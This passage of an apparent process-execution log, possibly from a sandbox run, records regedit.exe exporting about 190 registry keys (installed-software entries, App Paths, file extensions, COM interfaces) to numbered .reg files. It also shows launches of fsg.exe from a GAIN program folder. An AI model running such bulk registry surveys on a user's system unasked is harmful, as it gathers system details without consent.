/e "287.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft EdgeWebView"

C:\Windows\SysWOW64\regedit.exe

/e "288.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge Update"

C:\Windows\SysWOW64\regedit.exe

/e "289.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge"

C:\Windows\SysWOW64\regedit.exe

/e "290.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"

C:\Windows\SysWOW64\regedit.exe

/e "291.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC"

C:\Windows\SysWOW64\regedit.exe

/e "292.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"

C:\Windows\SysWOW64\regedit.exe

/e "293.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"

C:\Windows\SysWOW64\regedit.exe

/e "294.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"

C:\Windows\SysWOW64\regedit.exe

/e "295.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"

C:\Windows\SysWOW64\regedit.exe

/e "296.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"

C:\Windows\SysWOW64\regedit.exe

/e "297.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"

C:\Windows\SysWOW64\regedit.exe

/e "298.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"

C:\Windows\SysWOW64\regedit.exe

/e "299.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"

C:\Windows\SysWOW64\regedit.exe

/e "300.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"

C:\Windows\SysWOW64\regedit.exe

/e "301.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860"

C:\Windows\SysWOW64\regedit.exe

/e "302.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173"

C:\Windows\SysWOW64\regedit.exe

/e "303.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757"

C:\Windows\SysWOW64\regedit.exe

/e "304.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655"

C:\Windows\SysWOW64\regedit.exe

/e "305.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573"

C:\Windows\SysWOW64\regedit.exe

/e "306.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063"

C:\Windows\SysWOW64\regedit.exe

/e "307.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743"

C:\Windows\SysWOW64\regedit.exe

/e "308.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860"

C:\Windows\SysWOW64\regedit.exe

/e "309.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173"

C:\Windows\SysWOW64\regedit.exe

/e "310.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757"

C:\Windows\SysWOW64\regedit.exe

/e "311.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655"

C:\Windows\SysWOW64\regedit.exe

/e "312.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573"

C:\Windows\SysWOW64\regedit.exe

/e "313.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063"

C:\Windows\SysWOW64\regedit.exe

/e "314.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743"

C:\Windows\SysWOW64\regedit.exe

/e "315.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"

C:\Windows\SysWOW64\regedit.exe

/e "316.reg" "HKEY_CLASSES_ROOT\OneNote.NoteLinkStoreService\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "317.reg" "HKEY_CLASSES_ROOT\OneNote.NoteLinkMeta\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "318.reg" "HKEY_CLASSES_ROOT\OneNote.NoteLinkContentService\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "319.reg" "HKEY_CLASSES_ROOT\OneNote.PowerPointAddinTakeNotesButton\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "320.reg" "HKEY_CLASSES_ROOT\OneNote.WordAddinTakeNotesService\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "321.reg" "HKEY_CLASSES_ROOT\OneNote.WordAddinTakeNotesButton\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "322.reg" "HKEY_CLASSES_ROOT\OneNote.PowerPointAddinTakeNotesService\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "323.reg" "HKEY_CLASSES_ROOT\OfficePriv.Application\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "324.reg" "HKEY_CLASSES_ROOT\OfficeCompatible.Application.x86\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "325.reg" "HKEY_CLASSES_ROOT\OfficeCompatible.Application.x64\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "326.reg" "HKEY_CLASSES_ROOT\omicaut.MathInputControl\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "327.reg" "HKEY_CLASSES_ROOT\OneNote.NoteAnchorCollection\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "328.reg" "HKEY_CLASSES_ROOT\OneNote.NoteAnchor\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "329.reg" "HKEY_CLASSES_ROOT\OneNote.CFileConverter\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "330.reg" "HKEY_CLASSES_ROOT\read"

C:\Windows\SysWOW64\regedit.exe

/e "331.reg" "HKEY_CLASSES_ROOT\PPSLAX.SlideLibrary\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "332.reg" "HKEY_CLASSES_ROOT\PowerPivotExcelClientAddIn.NativeEntry\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "333.reg" "HKEY_CLASSES_ROOT\Udtool.UserDicManager\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "334.reg" "HKEY_CLASSES_ROOT\WinProj.Activator\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "335.reg" "HKEY_CLASSES_ROOT\WECAPI5.FpwUser\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "336.reg" "HKEY_CLASSES_ROOT\WECAPI5.FpwGroup\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "337.reg" "HKEY_CLASSES_ROOT\osf.RemoterProxy\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "338.reg" "HKEY_CLASSES_ROOT\osf.OsfAxControl\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "339.reg" "HKEY_CLASSES_ROOT\OSE.Global\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "340.reg" "HKEY_CLASSES_ROOT\osf.Sandbox\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "341.reg" "HKEY_CLASSES_ROOT\OWS.PostData\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "342.reg" "HKEY_CLASSES_ROOT\otkloadr.WRLoader\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "343.reg" "HKEY_CLASSES_ROOT\osf.SandboxContext\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "344.reg" "HKEY_CLASSES_ROOT\IMContact.IMContactRecognizer\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "345.reg" "HKEY_CLASSES_ROOT\Interface\{F062BA81-ADFE-4A92-886A-23FD851D6406}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "346.reg" "HKEY_CLASSES_ROOT\Interface\{F062BA81-ADFE-4A92-886A-23FD851D6406}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "347.reg" "HKEY_CLASSES_ROOT\Interface\{f0440f4e-4884-4a8F-8a45-ba89c00f96f2}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "348.reg" "HKEY_CLASSES_ROOT\Interface\{F0AF7C30-EAE4-4644-961D-54E6E28708D6}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "349.reg" "HKEY_CLASSES_ROOT\Interface\{F7F76FFB-E829-4360-9E57-F69C27FBA08A}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "350.reg" "HKEY_CLASSES_ROOT\Interface\{F57B7ED0-D8AB-11D1-85DF-00C04F98F42C}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "351.reg" "HKEY_CLASSES_ROOT\Interface\{F0AF7C30-EAE4-4644-961D-54E6E28708D6}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "352.reg" "HKEY_CLASSES_ROOT\Interface\{EFA9C1B9-47B0-4BD8-AC63-DDF785C505B4}\ProxyStubClsid"

C:\PROGRA~2\GAIN\fsg.exe

"C:\PROGRA~2\GAIN\fsg.exe"

\??\c:\program files (x86)\gain\fsg_4201.exe

"c:\program files (x86)\gain\fsg_4201.exe"

C:\Windows\SysWOW64\regedit.exe

/e "353.reg" "HKEY_CLASSES_ROOT\Interface\{EF189461-5D62-4626-8E57-FF83583C4826}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "354.reg" "HKEY_CLASSES_ROOT\Interface\{EEE00921-E393-11D1-BB03-00C04FB6C4A6}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "355.reg" "HKEY_CLASSES_ROOT\Interface\{EFA9C1B9-47B0-4BD8-AC63-DDF785C505B4}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "356.reg" "HKEY_CLASSES_ROOT\Interface\{f0440f4e-4884-4a8F-8a45-ba89c00f96f2}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "357.reg" "HKEY_CLASSES_ROOT\Interface\{EFC9437E-3A57-487C-8471-9151D2FC1832}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "358.reg" "HKEY_CLASSES_ROOT\Interface\{EFC9437E-3A57-487C-8471-9151D2FC1832}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "359.reg" "HKEY_CLASSES_ROOT\Interface\{FCFB3D2B-A0FA-1068-A738-08002B3371B5}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "360.reg" "HKEY_CLASSES_ROOT\Interface\{FCFB3D2B-A0FA-1068-A738-08002B3371B5}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "361.reg" "HKEY_CLASSES_ROOT\Interface\{FC30CDDE-9AD1-455D-A1BE-4B0D90ECEC92}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "362.reg" "HKEY_CLASSES_ROOT\Interface\{FD37FE32-82BC-4A25-B056-315F4DBB194D}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "363.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\dfshim.dll"

C:\Windows\SysWOW64\regedit.exe

/e "364.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\cmmgr32.exe"

C:\Windows\SysWOW64\regedit.exe

/e "365.reg" "HKEY_CLASSES_ROOT\Interface\{FEA77364-DF95-4A23-A905-019B79A8E481}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "366.reg" "HKEY_CLASSES_ROOT\Interface\{F9F2FE81-F764-4BD0-AFA5-5DE841DDB625}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "367.reg" "HKEY_CLASSES_ROOT\Interface\{F9F2FE81-F764-4BD0-AFA5-5DE841DDB625}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "368.reg" "HKEY_CLASSES_ROOT\Interface\{F7F76FFB-E829-4360-9E57-F69C27FBA08A}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "369.reg" "HKEY_CLASSES_ROOT\Interface\{fac14b75-7862-4ceb-be41-f53945a61c17}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "370.reg" "HKEY_CLASSES_ROOT\Interface\{FC30CDDE-9AD1-455D-A1BE-4B0D90ECEC92}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "371.reg" "HKEY_CLASSES_ROOT\Interface\{FB476970-9BAB-4861-811E-3E98B0C5ADDF}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "372.reg" "HKEY_CLASSES_ROOT\Interface\{fac14b75-7862-4ceb-be41-f53945a61c17}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "373.reg" "HKEY_CLASSES_ROOT\Interface\{EEE0091C-E393-11D1-BB03-00C04FB6C4A6}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "374.reg" "HKEY_CLASSES_ROOT\Interface\{e9de26a1-51b2-47b4-b1bf-c87059cc02a7}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "375.reg" "HKEY_CLASSES_ROOT\Interface\{E790E1D1-9DE8-4853-8AC6-933D4FD9C927}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "376.reg" "HKEY_CLASSES_ROOT\Interface\{E790E1D1-9DE8-4853-8AC6-933D4FD9C927}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "377.reg" "HKEY_CLASSES_ROOT\Interface\{e9de26a1-51b2-47b4-b1bf-c87059cc02a7}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "378.reg" "HKEY_CLASSES_ROOT\Interface\{EB41E8C1-4442-11D1-8906-00A0C9110049}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "379.reg" "HKEY_CLASSES_ROOT\Interface\{EA23A664-A558-4548-A8FE-A6B94D37C3CF}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "380.reg" "HKEY_CLASSES_ROOT\Interface\{EA23A664-A558-4548-A8FE-A6B94D37C3CF}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "381.reg" "HKEY_CLASSES_ROOT\Interface\{DF48072F-5EF8-434E-9B40-E2F3AE759B5F}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "382.reg" "HKEY_CLASSES_ROOT\Interface\{DA936B64-AC8B-11D1-B6E5-00A0C90F2744}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "383.reg" "HKEY_CLASSES_ROOT\Interface\{DA936B62-AC8B-11D1-B6E5-00A0C90F2744}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "384.reg" "HKEY_CLASSES_ROOT\Interface\{E2E1511D-502D-4BD0-8B3A-8A89A05CDCAE}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "385.reg" "HKEY_CLASSES_ROOT\Interface\{E480B861-4708-4E6D-A5B4-A2B4EEB9BAA4}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "386.reg" "HKEY_CLASSES_ROOT\Interface\{E43FD401-8715-11D1-98E7-00A0C9702442}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "387.reg" "HKEY_CLASSES_ROOT\Interface\{E43FD401-8715-11D1-98E7-00A0C9702442}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "388.reg" "HKEY_CLASSES_ROOT\Interface\{EE15BBBB-9E60-4C52-ABCB-7540FF3DF6B3}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "389.reg" "HKEY_CLASSES_ROOT\Interface\{EB41E8C5-4442-11D1-8906-00A0C9110049}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "390.reg" "HKEY_CLASSES_ROOT\Interface\{EB41E8C5-4442-11D1-8906-00A0C9110049}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "391.reg" "HKEY_CLASSES_ROOT\Interface\{EE15BBBB-9E60-4C52-ABCB-7540FF3DF6B3}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "392.reg" "HKEY_CLASSES_ROOT\Interface\{EEE00919-E393-11D1-BB03-00C04FB6C4A6}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "393.reg" "HKEY_CLASSES_ROOT\Interface\{EEE00915-E393-11D1-BB03-00C04FB6C4A6}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "394.reg" "HKEY_CLASSES_ROOT\Interface\{EE5A151A-AD2A-4CEE-AD65-228B59F5B4AD}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "395.reg" "HKEY_CLASSES_ROOT\Interface\{EB41E8C2-4442-11D1-8906-00A0C9110049}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "396.reg" "HKEY_CLASSES_ROOT\Interface\{EB41E8C2-4442-11D1-8906-00A0C9110049}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "397.reg" "HKEY_CLASSES_ROOT\Interface\{EB41E8C1-4442-11D1-8906-00A0C9110049}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "398.reg" "HKEY_CLASSES_ROOT\Interface\{EB41E8C3-4442-11D1-8906-00A0C9110049}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "399.reg" "HKEY_CLASSES_ROOT\Interface\{EB41E8C4-4442-11D1-8906-00A0C9110049}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "400.reg" "HKEY_CLASSES_ROOT\Interface\{EB41E8C4-4442-11D1-8906-00A0C9110049}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "401.reg" "HKEY_CLASSES_ROOT\Interface\{EB41E8C3-4442-11D1-8906-00A0C9110049}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "402.reg" "HKEY_CLASSES_ROOT\EntityPicker.EntityPicker\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "403.reg" "HKEY_CLASSES_ROOT\EntityDataProvider.EntityDataProvider\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "404.reg" "HKEY_CLASSES_ROOT\EntityDataHandler.EntityDataHandler\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "405.reg" "HKEY_CLASSES_ROOT\EntityPicker.PropPage1\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "406.reg" "HKEY_CLASSES_ROOT\ExcelPlugInShell.PowerMapConnect\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "407.reg" "HKEY_CLASSES_ROOT\ExcelPlugInShell.MapEdp\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "408.reg" "HKEY_CLASSES_ROOT\EntityPicker.PropPage2\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "409.reg" "HKEY_CLASSES_ROOT\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "410.reg" "HKEY_CLASSES_ROOT\.zoo"

C:\Windows\SysWOW64\regedit.exe

/e "411.reg" "HKEY_CLASSES_ROOT\.xps"

C:\Windows\SysWOW64\regedit.exe

/e "412.reg" "HKEY_CLASSES_ROOT\AdHocReportingExcelClientLib.AroAxControlShim\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "413.reg" "HKEY_CLASSES_ROOT\bingmaps"

C:\Windows\SysWOW64\regedit.exe

/e "414.reg" "HKEY_CLASSES_ROOT\BannerNotificationHandler.BannerNotificationHandler\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "415.reg" "HKEY_CLASSES_ROOT\AdHocReportingExcelClientLib.BusinessBarActiveX\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "416.reg" "HKEY_CLASSES_ROOT\HxDS.HxSession\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "417.reg" "HKEY_CLASSES_ROOT\HxDs.HxRegistryWalker\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "418.reg" "HKEY_CLASSES_ROOT\HxDS.HxRegisterSession\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "419.reg" "HKEY_CLASSES_ROOT\Ietag.EvtSink\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "420.reg" "HKEY_CLASSES_ROOT\IMContact.Factoid\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "421.reg" "HKEY_CLASSES_ROOT\Ietag.OOC\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "422.reg" "HKEY_CLASSES_ROOT\Ietag.Factory\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "423.reg" "HKEY_CLASSES_ROOT\FDate.Factoid\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "424.reg" "HKEY_CLASSES_ROOT\FBiblio.Factoid\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "425.reg" "HKEY_CLASSES_ROOT\ExcelPlugInShell.VisualizationLogger\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "426.reg" "HKEY_CLASSES_ROOT\FPerson.Factoid\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "427.reg" "HKEY_CLASSES_ROOT\HxDS.HxRegisterProtocol\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "428.reg" "HKEY_CLASSES_ROOT\FStock.Factoid\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "429.reg" "HKEY_CLASSES_ROOT\FPlace.Factoid\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "430.reg" "HKEY_CLASSES_ROOT\.wsb"

C:\Windows\SysWOW64\regedit.exe

/e "431.reg" "HKEY_CLASSES_ROOT\.bz2"

C:\Windows\SysWOW64\regedit.exe

/e "432.reg" "HKEY_CLASSES_ROOT\.arj"

C:\Windows\SysWOW64\regedit.exe

/e "433.reg" "HKEY_CLASSES_ROOT\.arc"

C:\Windows\SysWOW64\regedit.exe

/e "434.reg" "HKEY_CLASSES_ROOT\.bzip2"

C:\Windows\SysWOW64\regedit.exe

/e "435.reg" "HKEY_CLASSES_ROOT\.dctx"

C:\Windows\SysWOW64\regedit.exe

/e "436.reg" "HKEY_CLASSES_ROOT\.dat"

C:\Windows\SysWOW64\regedit.exe

/e "437.reg" "HKEY_CLASSES_ROOT\.chm"

C:\Windows\SysWOW64\regedit.exe

/e "438.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\MsoHtmEd.exe"

C:\Windows\SysWOW64\regedit.exe

/e "439.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\install.exe"

C:\Windows\SysWOW64\regedit.exe

/e "440.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\fsquirt.exe"

C:\Windows\SysWOW64\regedit.exe

/e "441.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\setup.exe"

C:\Windows\SysWOW64\regedit.exe

/e "442.reg" "HKEY_CLASSES_ROOT\.7z"

C:\Windows\SysWOW64\regedit.exe

/e "443.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\vstoee.dll"

C:\Windows\SysWOW64\regedit.exe

/e "444.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\table30.exe"

C:\Windows\SysWOW64\regedit.exe

/e "445.reg" "HKEY_CLASSES_ROOT\.nls"

C:\Windows\SysWOW64\regedit.exe

/e "446.reg" "HKEY_CLASSES_ROOT\.lzh"

C:\Windows\SysWOW64\regedit.exe

/e "447.reg" "HKEY_CLASSES_ROOT\.jod"

C:\Windows\SysWOW64\regedit.exe

/e "448.reg" "HKEY_CLASSES_ROOT\.oxps"

C:\Windows\SysWOW64\regedit.exe

/e "449.reg" "HKEY_CLASSES_ROOT\.stl"

C:\Windows\SysWOW64\regedit.exe

/e "450.reg" "HKEY_CLASSES_ROOT\.rar"

C:\Windows\SysWOW64\regedit.exe

/e "451.reg" "HKEY_CLASSES_ROOT\.ply"

C:\Windows\SysWOW64\regedit.exe

/e "452.reg" "HKEY_CLASSES_ROOT\.exc"

C:\Windows\SysWOW64\regedit.exe

/e "453.reg" "HKEY_CLASSES_ROOT\.dsn"

C:\Windows\SysWOW64\regedit.exe

/e "454.reg" "HKEY_CLASSES_ROOT\.dctxc"

C:\Windows\SysWOW64\regedit.exe

/e "455.reg" "HKEY_CLASSES_ROOT\.fbx"

C:\Windows\SysWOW64\regedit.exe

/e "456.reg" "HKEY_CLASSES_ROOT\.imesx"

C:\Windows\SysWOW64\regedit.exe

/e "457.reg" "HKEY_CLASSES_ROOT\.gltf"

C:\Windows\SysWOW64\regedit.exe

/e "458.reg" "HKEY_CLASSES_ROOT\.glb"

C:\Windows\SysWOW64\regedit.exe

/e "459.reg" "HKEY_CLASSES_ROOT\Interface\{000C03A3-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "460.reg" "HKEY_CLASSES_ROOT\Interface\{000C03A2-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "461.reg" "HKEY_CLASSES_ROOT\Interface\{000C03A1-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "462.reg" "HKEY_CLASSES_ROOT\Interface\{000C03A4-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "463.reg" "HKEY_CLASSES_ROOT\Interface\{000C03A7-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "464.reg" "HKEY_CLASSES_ROOT\Interface\{000C03A6-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "465.reg" "HKEY_CLASSES_ROOT\Interface\{000C03A5-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "466.reg" "HKEY_CLASSES_ROOT\Interface\{000C0397-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "467.reg" "HKEY_CLASSES_ROOT\Interface\{000C0396-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "468.reg" "HKEY_CLASSES_ROOT\Interface\{000C0395-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "469.reg" "HKEY_CLASSES_ROOT\Interface\{000C0398-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "470.reg" "HKEY_CLASSES_ROOT\Interface\{000C03A0-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "471.reg" "HKEY_CLASSES_ROOT\Interface\{000C039A-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "472.reg" "HKEY_CLASSES_ROOT\Interface\{000C0399-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "473.reg" "HKEY_CLASSES_ROOT\Interface\{000C03C1-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "474.reg" "HKEY_CLASSES_ROOT\Interface\{000C03C0-0000-0000-C000-000000000046}\ProxyStubClsid32"

